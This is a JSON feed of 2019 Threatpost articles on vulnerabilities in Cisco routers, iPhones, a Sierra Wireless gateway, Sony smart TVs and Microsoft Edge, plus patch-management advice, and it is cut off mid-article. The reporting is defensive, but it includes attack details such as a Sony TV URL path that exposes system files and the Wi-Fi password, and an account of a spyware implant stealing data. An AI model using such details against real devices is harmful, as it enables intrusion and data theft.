{"threatpost": [{"lastseen": "2019-11-03T07:05:31", "bulletinFamily": "info", "description": "Cisco Systems released patches for 29 bugs [Wednesday that addressed flaws](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities>) in a wide range of its products including routers and switches running the IOS XE networking software. Thirteen of the vulnerabilities revealed are rated high severity.\n\nThe bulk of the high-severity vulnerabilities are tied to conditions that could lead to denial-of-service attacks, while others are command injection bugs ([CVE-2019-12650 and CVE-2019-12651](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-webui-cmd-injection>)) and one digital signature verification bypass flaw ([CVE-2019-12649](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-iosxe-digsig-bypass>)).\n\nOne of the bugs ([CVE-2019-12648](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-ios-gos-auth>)) impacts Cisco 800 and 1000 series routers running Cisco\u2019s IOS software with \u201cGuest OS\u201d installed. \u201cAn exploit could allow the attacker to gain unauthorized access to the Guest OS as a _root_ user,\u201d the advisory states.[](<https://threatpost.com/newsletter-sign/>)\n\nInterestingly, the bug (CVE-2019-12648) has a Common Vulnerability Scoring System (version 3) score of 9.9. The score should indicate a critical-severity rating, however it\u2019s unclear why a 9.9 bug would only get a high-severity rating.\n\nAnother ISO XE bug ([CVE-2019-12653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-rawtcp-dos>)), affecting Cisco\u2019s ASR 900 series routers, \u201ccould allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service condition,\u201d Cisco wrote.\n\nPart of Wednesday\u2019s security alerts also included [a warning to users](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-l2-traceroute>) of its L2 traceroute feature in IOS. Cisco is advising those users to disable an L2 traceroute feature in IOS for which there is public exploit code. The L2 traceroute feature is enabled by default in Cisco IOS and IOS XE Software for Cisco Catalyst switches, Cisco wrote.\n\nPatches released on Wednesday dovetail two bugs, rated critical, addressed last week impacting the networking giant\u2019s Cisco Data Center Network Manager. One those flaws ([CVE-2019-1619](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass>)) is an authentication bypass bug with a CVSS score of 9.8.\n\n\u201cA vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device,\u201d Cisco wrote.\n\nThe other critical bug ([CVE-2019-1620](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex>)) impacting the DCNM is an arbitrary file upload and remote code execution vulnerability with a CVSS rating of 9.8. Cisco said a successful exploitation of the bug \u201ccould allow an unauthenticated, remote attacker to upload arbitrary files on an affected device.\u201d\n\n**What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free [Threatpost webinar](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>), \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d [Click here to register](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>). **\n", "modified": "2019-09-26T17:26:03", "published": "2019-09-26T17:26:03", "id": "THREATPOST:05C83E488D9CF5E71AD1F4F7018EA8B9", "href": "https://threatpost.com/cisco-high-severity-bugs-2/148706/", "type": "threatpost", "title": "Cisco Patches 13 High-Severity Router and Switch Bugs", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T07:04:16", "bulletinFamily": "info", "description": "Patch management is a thankless job. Data shows, despite best efforts, that 80 percent of enterprise applications have at least one unpatched vulnerability in them, according research by[ Veracode](<https://www.veracode.com/state-of-software-security-report>).\n\nIt is not for lack of trying that vulnerabilities persist. Last year 16,500 [vulnerabilities were reported](<https://www.cvedetails.com/browse-by-date.php>), making patching each one nearly an impossible task for any one company. Perhaps it shouldn\u2019t be a surprise that Windows patching times appear to be moving in the wrong direction. According to Edgescan, the average of 63 days to patch in 2017 to 81 days in 2018.\n\nWhat these statistics reveal is a process suffering under the weight of a shifting IT ecosystem that has ballooned to include a flood of bug submissions from a new crop of bounty programs, scrutinizing the growing army of chip-enabled gear.\n\nThe good news is that there\u2019s hope. Patching experts say there are concrete steps companies can take to avoid patch fatigue. Identifying the problems is an important first step.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103016/Veracode_Vulns_Numbers.png>)\n\nClick to Enlarge (courtesy Veracode)\n\n## Building a Better Patch Process\n\n\u201cOne of the biggest patching challenges is first identifying everything that needs to be patched,\u201d said Chris Goettl, director of product management and security for Ivanti. \u201cThe challenge becomes keeping a handle on how big a company\u2019s universe of devices is \u2014 and knowing what has been patched and what still needs to be.\u201d\n\nAdd in vulnerabilities related to software dependencies, such as the third-party code underlying software, and patching becomes even more arduous. Code repositories, open-source projects and small vendors poorly communicate bugs in their often complex library dependencies, he said.\n\n[Stagefright](<https://threatpost.com/stagefright-2-0-vulnerabilities-affect-1-billion-android-devices/114863/>), [Devil\u2019s Ivy](<https://threatpost.com/bad-code-library-triggers-devils-ivy-vulnerability-in-millions-of-iot-devices/126913/>) and the [Zip Slip flaw](<https://threatpost.com/zip-slip-flaw-affects-thousands-of-open-source-projects/132577/>) are just of few examples of vulnerabilities affecting thousands of open-source projects. And last month, VLC developer VideoLAN alerted customers [of a \u201chigh-risk\u201d bug](<https://threatpost.com/high-risk-vlc-media-player-bugs/147503/>) tied to a third-party component called MKV demuxer \u2014 a component responsible for multiplexing digital and analog files. The bug could allow an adversary to craft a malicious .MKV video file that could be used in an attack to gain control of the victim\u2019s PC, according to VideoLAN.\n\n\u201cWe assume a given developer is going to provide patches for their code. Obviously, they are going to fix any of vulnerabilities. But almost every product these days is based on other third-party components. There is Apache Struts, Microsoft .NET core and Java development kits. It\u2019s very important that the components are updated as well,\u201d said Todd Schell, senior product manager, security, for Ivanti.\n\nThese are vulnerabilities that are compiled into the code and aren\u2019t something found by regular IT staff, Schell said. Developers, not just IT and security operations staff, need to be aware \u2013 pushing companies to adopt a DevOps approach to security.\n\n## A Race to Zero\n\nGoettl also noted that there is a race by hackers and researchers alike to shrink the time between a zero-day bug discovery and the publishing of a proof-of-concept (PoC) exploit of the flaw.\n\nIn the case of the \u201cwormable\u201d vulnerability known as BlueKeep ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)), [Microsoft patched the bug on May](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>) 14, and by May 22 a [proof-of-concept (PoC) exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) of the flaw was demonstrated. Other [PoCs followed](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>) in the [subsequent months](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>). On Thursday, Palo Alto Networks published [three additional](<https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/>) ways to exploit system that have not been patched for BlueKeep.\n\nPoCs offer security professionals vital and needed clues on how to identify a threat and mitigate against it. But, if patching isn\u2019t part of the PoC discovery and fix, it could lead to catastrophic results \u2013 think [EternalBlue and WannaCry](<https://threatpost.com/tag/wannacry/page/3/>).\n\nAs of July, the number of systems that remain exposed and unpatched to BlueKeep is [close to 800,000](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>), according to BitSight.\n\n## Making Sense of CVSS Scores\n\nTyler Reguly, manager of security, researcher and development for Tripwire, points out that the sheer number of patches that face IT and security teams leads to patch fatigue. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities and is meant to help with that; CVSS scores assign severity scores to vulnerabilities with the intent of giving security professionals the ability to prioritize responses.\n\nHowever, oftentimes the severity score is higher than the threat really warrants; and sometimes it\u2019s the other way around, Reguly said.\n\n\u201cWhat you end up with is a lot of people looking at these CVSS scores, confused, asking themselves \u2018what should I patch, when should I patch it,'\u201d he said.\n\nMatthew Howell, senior director of product for Flashpoint, recommends that when it comes to patch prioritization, IT needs to evaluate the threat variables of a bug as they relate to one\u2019s specific network. In a recent [blog post, he recommends](<https://www.flashpoint-intel.com/blog/a-clean-view-of-vulnerabilities-helps-prioritize-patching/>) that security teams ask themselves:\n\n * _ How likely the vulnerability is to be exploited in the wild?_\n * _ If the vulnerability is exploited in the wild, how likely it is to impact your organization?_\n * _ If the vulnerability is exploited at your organization, what impact it is likely to have? _\n\nThe CVSS score assigned to a vulnerability reflects severity, not risk, Howell wrote.\n\n## Automating the Patching Process\n\nReguly says one of the best antidotes to fend off patching fatigue is automating as much of the patching process as possible. \u201cYou really need to architect to automate. That includes patching software, but also the processes as well,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/25161620/Patch-Management.jpg>)That includes configuring orchestration tools such as Puppet to help automate the patching process. \u201cIf possible, some patch software supports APIs [and] can be used to tie in through an API for patch management and configuration management,\u201d Reguly said.\n\nHe said automation also includes patch validation and making sure patches and security updates are implemented properly. Lastly, he recommends determining if a software vendor\u2019s service-level agreement might also be leveraged to help with the patching process.\n\n## Driving a Stake in the Heart of a Check-Box Security Mentality\n\nJimmy Graham, senior director of vulnerability management, for Qualys, calls the process vulnerability management, not just patch management. He warns against focusing exclusively on patch management to the exclusion of the bigger security picture.\n\nHe promotes the idea of vulnerability management lifecycles that start with asset inventory, collecting vulnerability information locally, prioritizing vulnerabilities and then moving to patch management.\n\n\u201cPatch management is a cyclical process where you are patching systems based on the fact a patch was released by a vendor. Vulnerability management is there to make sure that patching was effective as well as the configuration management,\u201d Graham said.\n\n## Best Practices\n\nBest practices, according to Graham, include creating a patching cadence based on vendor releases. IT should also identify and prioritize patches based on the company\u2019s unique infrastructure, and then test and deploy the patches themselves. Follow-up is just as important, he said, such as documenting the process for each technology patched \u2014 from operating systems to databases.\n\nHe also recommends patching and updating \u201cgolden images\u201d (master software images used by IT for mass software deployment) at least quarterly. \u201cThat way all new systems are remediated before they go into production,\u201d he said.\n\nThe goal is to significantly reduce or eliminate one-off patching.\u201dIf you\u2019ve ever tried to figure out what version of Flash to deploy, then you aren\u2019t doing it right,\u201d Graham said.\n\n**[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103951/DevOps.jpg>)**\n\n## The DevSecOps Approach\n\nStill others advocate taking a DevSecOps approach to security \u2014 i.e., a blending of software development, IT operations and security practices into a streamlined system lifecycle.\n\n\u201cThere is a strong correlation between how many times an organization scans and how quickly they address their vulnerabilities,\u201d Veracode said in [its _State of Software Security_ report](<https://www.veracode.com/state-of-software-security-report>). \u201cDevOps, or agile-driven development teams, are scanning more often, and as a result, they are making incremental [security] improvements every time they test.\u201d\n\nVeracode asserts that once organizations hit 300 or more internal scans per year, companies are seeing the \u201cfix velocity going into overdrive.\u201d Therefore, DevSecOps in theory could be vital when it comes to spotting bugs early in the development process \u2013 making vulnerabilities easier, faster and less expensive it is to fix, [security experts say](<https://threatpost.com/how-to-solve-the-developer-vs-cybersecurity-team-battle/133759/>) .\n\nThere\u2019s a caveat to this though: The idea presupposes an unlikely harmonious relationship between developers and security teams. Often development teams are under pressure to deliver feature-rich applications on near impossible deadlines. Security teams, on the other hand, are under growing pressure to safeguard data.\n\n## Patching Landscape Moves to Cloud\n\nThings are changing in the patching landscape as more compute moves to the cloud. Applications such as Salesforce and Office 365 represent a growing number cloud-based solutions running on AWS, Google Compute and Microsoft Azure. As the move to cloud services grows, cloud providers share the responsibility for security with their customers, Schell said.\n\nThe Cloud Native Computing Foundation, the organization behind popular container project Kubernetes, has had to tackle a number of [vulnerabilities in its platform](<https://github.com/kubernetes/kubernetes>). One bug [found last month](<https://groups.google.com/forum/#!topic/kubernetes-security-announce/vUtEcSEY6SM>) could allow an adversary to access, modify or delete computing and storage resources configured across a cluster. Also last month there was an Azure update addressing a Kubernetes component that had a known vulnerability.\n\nThe shift from on-premise to off-premise (cloud) computing is a game changer for security teams, and it forces them to forfeit some control to platform providers, Schell said.\n\n\u201cIt\u2019s fully upon the shoulders of the [cloud] service provider to make sure the application is running with the most recent performance enhancements and security updates. And there is not much we can do as users,\u201d he said.\n\n_(A portion of this article is adopted from a previous Threatpost webinar \u201c[Streamlining Patch Management](<https://threatpost.com/streamlining-patch-management-expert-advice/146686/>)\u201c. In this 60-minute presentation, available on-demand, experts Todd Schell, senior product manager, security, for Ivanti; Tyler Reguly, manager of security R&D, for Tripwire; and Jimmy Graham, senior directory, vulnerability management, for Qualys, are joined by Threatpost editor Tom Spring to discuss streamlining patch management and offer patching advice, tips and tricks.)_\n", "modified": "2019-09-03T19:17:11", "published": "2019-09-03T19:17:11", "id": "THREATPOST:472451689B2FA39FCB837D08B514FF91", "href": "https://threatpost.com/how-to-handle-patch-management/147909/", "type": "threatpost", "title": "How to Get a Handle on Patch Management", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T07:06:21", "bulletinFamily": "info", "description": "A total of 14 iPhone vulnerabilities \u2013 including two that were zero-days when discovered \u2014 have been targeted by five exploit chains in a watering hole attack that has lasted years.\n\nThe watering holes deliver a spyware implant that can steal private data like iMessages, photos and GPS location in real time, according to Ian Beer with Google\u2019s Project Zero team.\n\n\u201cThere was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant,\u201d he wrote in a [blog post](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) on Friday. \u201cWe estimate that these sites receive thousands of visitors per week.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBeer said there were seven bugs for the iPhone\u2019s web browser, five for the kernel and two separate sandbox escapes used in the attack. Google was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12.\n\n\u201cInitial analysis indicated that at least one of the privilege escalation chains was still 0-day and unpatched at the time of discovery [in January] (CVE-2019-7287 & CVE-2019-7286),\u201d he wrote.\n\nHe added that the scope of the versions targeted \u201cindicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years.\u201d\n\nGoogle disclosed the issues to Apple in January, which resulted in the out-of-band release of iOS 12.1.4 in Feb 2019; the vulnerabilities were [publicly disclosed](<https://support.apple.com/en-us/HT209520>) at that point.\n\n## Implant Details\n\nThe malware payload used in the attack is a custom job, built for monitoring. It requests commands from a command and control server (C2) every 60 seconds, and is primarily focused on stealing files and uploading live location data. Beer\u2019s analysis showed that it can be used to get around some of the protections that dissidents for example use to protect their privacy (and in many cases physical safety).\n\nAccording to Beer, the attackers used the exploit chains to gain unsandboxed code execution as root on iPhones. From there, the attackers called \u201cposix_spawn,\u201d passing the path to their implant binary which they dropped in /tmp, which starts the implant running in the background as root.\n\n\u201cThe implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in,\u201d the researcher detailed. \u201cUsing jtool, we can view the entitlements the implant has\u2026the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary\u2019s code signature to the kernel trust cache.\u201d\n\nIn his testing, Beer was able to use the malware to steal database files on an infected phone used by encrypted messaging apps like Whatsapp, Telegram and iMessage \u2013 meaning he could lift the unencrypted, plain-text of the messages sent and received.\n\nThat same technique could be used across the device.\n\n\u201cThe implant can upload private files used by all apps on the device; [such as] the plaintext contents of emails sent via Gmail, which are uploaded to the attacker\u2019s server,\u201d Beer said.\n\nThe implant also takes copies of the user\u2019s complete contacts database, including full names and numbers stored in the iPhone contacts, copies photos, and can upload the user\u2019s location in real time, up to once per minute, if the device is online.\n\nThen there\u2019s the keychain, which the iPhone uses to store credentials and certificates, such as the SSIDs and passwords for all saved Wi-Fi access points.\n\n\u201cThe keychain also contains the long-lived tokens used by services such as Google\u2019s iOS Single-Sign-On to enable Google apps to access the user\u2019s account,\u201d Beer said. \u201cThese will be uploaded to the attackers and can then be used to maintain access to the user\u2019s Google account, even once the implant is no longer running.\u201d\n\nThe IP address of the server to upload content to is hardcoded in the implant binary.\n\n\u201cThis function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string \u201c9ff7172192b7\u2033 delimiting the fields in the body data),\u201d Beer explained.\n\nAlso concerning is the fact that nothing is encrypted \u2013 everything is sent to the C2 via HTTP (not HTTPS), opening up the potential for the data to leak to others.\n\n\u201cIf you\u2019re connected to an unencrypted Wi-Fi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command-and-control server,\u201d Beer said. \u201cThis means that not only is the endpoint of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server.\u201d\n\nThe malware is not persistent and is cleared if the iPhone is rebooted. However, \u201cgiven the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device,\u201d Beer said.\n\nFor users, they wouldn\u2019t know they\u2019ve been infected, allowing the binary to keep tabs on them for as long as the user goes without rebooting.\n\n\u201cThere is no visual indicator on the device that the implant is running. There\u2019s no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system,\u201d according to the researcher.\n\nHe said that the watering holes (no details on them were given) are clearly targeting certain cohorts of people. Though he didn\u2019t explicitly say if they were political or demographic groups, Beer intimated the former.\n\n\u201cI hope to guide the general discussion around exploitation away from a focus on the [million dollar dissident](<https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/>) and towards discussion of the marginal cost for monitoring the n+1\u2019th potential future dissident,\u201d he said. \u201cI shan\u2019t get into a discussion of whether these exploits cost $1 million, $2 million, or $20 million. I will instead suggest that all of those price tags seem low for the capability to target and monitor the private activities of entire populations in real time.\u201d\n\nHe also said that the watering holes, zero-days and exploits that Google discovered are likely the tip of the iceberg: \u201cFor this one campaign that we\u2019ve seen, there are almost certainly others that are yet to be seen.\u201d\n\n**_Interested in more on the internet of things (IoT)? Don\u2019t miss our on-demand _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3926374015661345537?source=ART>)**_, IoT: Implementing Security in a 5G World. Join Threatpost senior editor Tara Seals and a panel of experts as they offer enterprises and other organizations insight about how to approach security for the next wave of IoT deployments, which will be enabled by the rollout of 5G networks worldwide. _**[**_Click here to listen to the recorded webinar. _**](<https://attendee.gotowebinar.com/register/3926374015661345537?source=ART>)\n\n_ _\n\n_ _\n", "modified": "2019-08-30T16:48:33", "published": "2019-08-30T16:48:33", "id": "THREATPOST:BD7F094F9E39A7E7C41B12FDA60A8D2D", "href": "https://threatpost.com/iphone-zero-days-watering-hole-attacks/147891/", "type": "threatpost", "title": "iPhone Zero-Days Anchored Watering-Hole Attacks", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-03T07:09:25", "bulletinFamily": "info", "description": "A 5G wireless gateway tailored for industrial internet of things (IoT), retail point-of-sale and enterprise redundancy applications is riddled with vulnerabilities, include two critical bugs that allow remote code-execution (RCE) and arbitrary command-injection.\n\nThe Sierra Wireless AirLink ES450 LTE gateway (version 4.9.3) has 11 different bugs, which could be exploited for RCE, uncovering user credentials (including the administrator\u2019s password) and other scenarios, according to Cisco Talos, which found the issues. Sierra Wireless has issued an update and administrators are encouraged to apply it.\n\n\u201cThe majority of these vulnerabilities exist in ACEManager, the web server included with the ES450,\u201d Cisco explained in [an advisory](<https://blog.talosintelligence.com/2019/04/vulnerability-sierra-airlink.html>) on Thursday. \u201cACEManager is responsible for the majority of interactions on the device, including device reconfiguration, user authentication and certificate management.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe most serious of the flaws is a critical RCE vulnerability ([CVE-2018-4063](<https://www.talosintelligence.com/reports/TALOS-2018-0748>)), CVSS score of 9.9, in the upload.cgi function of the ACEManager, which allows an attacker to use a specially crafted HTTP request to upload executable code, to be routed to the web server.\n\n\u201cWhen uploading template files, you can specify the name of the file that you are uploading,\u201d according to Cisco. \u201cThere are no restrictions in place that protect the files that are currently on the device, used for normal operation. If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.\u201d\n\nFurther, since ACEManager is running as root, any executables that are run by those files will be running also as root. \u201cBy uploading a small wrapper, we can upload arbitrary code to the device and run by simply navigating to the web page through the browser,\u201d Cisco noted.\n\nAlso in the upload.cgi function, an unverified password change vulnerability ([CVE-2018-4064](<https://www.talosintelligence.com/reports/TALOS-2018-0749>)) opens the door to an unverified device configuration change, resulting in an unverified change of the `user` password on the device.\n\nIn both cases, an attacker exploiting the upload.cgi bugs can make an authenticated HTTP request to trigger the vulnerability.\n\nThere\u2019s also a critical command-injection vulnerability ([CVE-2018-4061](<https://www.talosintelligence.com/reports/TALOS-2018-0746>)), CVSS score of 9.9, which exists in the ACEManager iplogging.cgi functionality. An authenticated attacker can send a specially crafted HTTP request to inject arbitrary commands, resulting in arbitrary command execution as root. This bug most likely also affects the also most likely affects the AirLink GX450 product, Cisco added.\n\nAnother problem arises from having hard-coded credentials ([CVE-2018-4062](<https://www.talosintelligence.com/reports/TALOS-2018-0747>)) in the SNMPD function of the gateway.\n\n\u201cActivating SNMPD outside of the WebUI can cause the activation of the hard-coded credentials, resulting in the exposure of a privileged user,\u201d according to Cisco. \u201cAn attacker can activate SNMPD without any configuration changes to trigger this vulnerability.\u201d\n\nMeanwhile, there are four information-disclosure vulnerabilities. For one, the ACEManager authentication functionality is done in plaintext XML to the web server ([CVE-2018-4069](<https://www.talosintelligence.com/reports/TALOS-2018-0754>)), so an attacker can listen to network traffic upstream from the device to sniff out credentials.\n\nThe other three ([CVE-2018-4067](<https://www.talosintelligence.com/reports/TALOS-2018-0752>), [CVE-2018-4068](<https://www.talosintelligence.com/reports/TALOS-2018-0753>) and [CVE-2018-4070/CVE-2018-4071](<https://www.talosintelligence.com/reports/TALOS-2018-0755>)) can expose internal paths and files; the default configuration for the device; or plain text passwords and SNMP community strings. An attacker can send an unauthenticated HTTP request to trigger any of these.\n\nOther bugs include a permission assignment vulnerability ([CVE-2018-4072/CVE-2018-4073](<https://www.talosintelligence.com/reports/TALOS-2018-0756>)), a cross-site scripting (CSS) vulnerability ([CVE-2018-4065](<https://www.talosintelligence.com/reports/TALOS-2018-0750>)) and a cross-site request forgery (CSRF) vulnerability ([CVE-2018-4066](<https://www.talosintelligence.com/reports/TALOS-2018-0751>)).\n\nThe gateway is billed as a \u201ca reliable, secure LTE gateway,\u201d and is one of the first-to-market to capitalize on the deployment of next-generation 5G mobile networks, which are expected to support [a whole raft of new use cases](<https://threatpost.com/5g-security/140664/>), especially in the industrial IoT space. But as these flaws illustrate, vulnerabilities come with any new territory.\n\n\u201cHistory has shown us that when we expand our computing power and connectivity, we open up a new landscape for attackers to use against us, with prime examples of this being the cloud and connected IoT devices,\u201d Steve McGregory, senior director of application and threat intelligence at Ixia, told Threatpost. He added, \u201cWe are racing into 5G just as we did with IoT and the cloud\u2026if that trend is to continue, then we must plan and prepare.\u201d\n", "modified": "2019-04-26T17:12:06", "published": "2019-04-26T17:12:06", "id": "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "href": "https://threatpost.com/critical-flaws-sierra-wireless-5g/144142/", "type": "threatpost", "title": "Critical Flaws in Sierra Wireless 5G Gateway Allow RCE, Command Injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T07:09:26", "bulletinFamily": "info", "description": "Two vulnerabilities in Android-based smart-TVs from Sony, including the flagship Bravia line, could allow attackers to access WiFi passwords and images stored on the devices.\n\nThe bugs exist in the Photo Sharing Plus feature of Sony smart-TVs going back to 2015. They were uncovered by xen1thLabs in October; Sony in response [has removed](<https://www.sony.com/electronics/support/televisions-projectors/articles/00204331>) the vulnerable application from all new models and the bugs were disclosed on Monday.\n\nIt\u2019s important to remember that the vulnerabilities exist not only in homes but also in companies and organizations where smart TVs are used in conference and meeting rooms, widening the scope of the threat surface.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Photo Sharing Plus application allows the uploading of pictures and multimedia from a smartphone to a TV, in order to show content in a slideshow format. The first vulnerability (CVE-2019-11336) allows an attacker, without authentication, to retrieve the WiFi password created by the television when the Photo Sharing Plus application is started. The second (CVE-2019-10886) allows an attacker to read arbitrary files, including images, located within the TV\u2019s software, without authentication.\n\nOn the first point, when started, the app essentially turns the TV into a WiFi access point and shows a WiFi password that allows customers to connect and share their media content, according to xen1thLabs. It\u2019s possible for an attacker to retrieve this password in plaintext from the logs kept in the Photo Sharing Plus API, according to the researchers, which is reachable via the home network or corporate LAN and which has no access restrictions on it.\n\nThe second bug opens up internal smart-TV files to cyberattackers: \u201cBy default, images used by the Photo Sharing Plus application are stored inside \u2018/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/\u2019,\u201d explained the team, in [an advisory](<https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/>) this week. \u201cThe application initiates an access point on the television and a HTTP daemon is listening to a TCP port on the newly created WLAN. Furthermore, this daemon also listens on the LAN side of the television, and it is possible to retrieve these images from the LAN an image using [a hardcoded URL without authentication].\u201d\n\nFurther, browsing to the hard-coded web address \u201chttp://[ip_tv]:10000/contentshare/image/\u201d allows access to the Android-based root directory of the television, along with its default property files; these include the wireless password for the television.\n\nIn either case, attackers could upload their own content or pilfer content from the TV owners.\n\nTo be clear, an adversary would need to first access the network in order to exploit either vulnerability \u2013 so the attack would be local or require a multi-stage effort involving gaining remote network access.\n\nA list of affected models can be found [here](<https://www.sony.com/electronics/support/televisions-projectors/articles/00204331>) \u2013 the list is not comprehensive, according to xen1thLabs.\n\nThis is not the first issue for Sony TVs and Photo Sharing Plus. In October, security researchers revealed that eight Sony Bravia smart TV models [were vulnerable](<https://threatpost.com/sony-smart-tv-bug-allows-remote-access-root-privileges/138063/>) to a command-injection (CVE-2018-16593) bug tied to Photo Sharing Plus.\n\n\u201cThis application handles file names incorrectly when the user uploads a media file,\u201d wrote Fortinet\u2019s Tony Loi at the time, who found the vulnerability. \u201cAn attacker can abuse such filename mishandling to run arbitrary commands on the system, which can result in complete remote code-execution with root privilege.\u201d\n\nThe bugs illustrate the snowballing threat surface of smart devices and the internet of things (IoT), and the need for more awareness on the part of consumers and businesses alike.\n\n\u201cAny one of the billions of devices connected to a network, no matter how small, could be a target for hackers looking for a vulnerable path to a network or as part of a more widespread attack on a particular device type or channel,\u201d said Gil Bernabeu, technical director at GlobalPlatform, in [a recent blog](<https://globalplatform.org/is-it-impossible-to-securely-manage-the-billions-of-things-in-the-iot-ecosystem-2/?utm_source=iseepr&utm_medium=Blog&utm_campaign=SecureComponent>) on IoT security. \u201cAs the number and nature of use cases grow, so too do the risks.\u201d\n", "modified": "2019-04-25T22:13:31", "published": "2019-04-25T22:13:31", "id": "THREATPOST:24AD38597408C4E7757770D45345AEBA", "href": "https://threatpost.com/android-sony-smart-tvs/144133/", "type": "threatpost", "title": "Android-Based Sony Smart-TVs Open to Image Pilfering", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T07:14:59", "bulletinFamily": "info", "description": "Microsoft patched a bevy of critical bugs impacting its Edge browser that could allow an attacker to hijack a targeted PC simply by steering a victim to a rigged website harboring specially crafted exploit code. In all, Microsoft tackled four critical Edge vulnerabilities, part of the company\u2019s first 2019 round of Patch Tuesday bug fixes.\n\nEach of the browser bugs are memory corruption vulnerabilities. Three ([CVE-2019-0539](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0539>), [CVE-2019-0568](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0568>), [CVE-2019-0567](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0567>)) are tied to Microsoft\u2019s own JavaScript engine called Chakra Scripting Engine. The fourth ([CVE-2019-0565](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0565>)) is a remote code execution vulnerability that exists when Edge improperly accesses objects in memory, according to Microsoft.\n\nIn total, Microsoft patched 49 vulnerabilities on Tuesday, seven listed as critical, 40 important and two ranked as moderate. Of particular interest is a Jet Database Engine remote code execution vulnerability ([CVE-2019-0579](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0579>)) that was publicly known ahead of the patch, but not exploited in the wild.\n\n\u201cA remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system,\u201d Microsoft wrote.\n\nAccording to the Microsoft security bulletin, to exploit the Jet vulnerability an adversary would first have to trick a victim to open a malicious file.\n\nAnother notable patch was for a Skype for Android elevation of privilege vulnerability ([CVE-2019-0622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0622>)) that could have allowed hackers to bypass authentication methods and access personal data on an Android device \u2013 simply by answering a Skype call to that device. Threatpost reported [on the bug on Monday](<https://threatpost.com/skype-glitch-allowed-android-authentication-bypass/140586/>).\n\n\u201cObviously, an attacker would need physical access to your phone to do this. According to published [reports](<https://www.theregister.co.uk/2019/01/03/android_skype_app_unlock/>), a fix for this was included in the December 23 release of Skype, so this release is primarily documenting the details. Although Microsoft does not list this as publicly known, the researcher posted a YouTube [video](<https://youtu.be/EiEcwOfTFqI>) demonstrating the vulnerability back on December 31. To 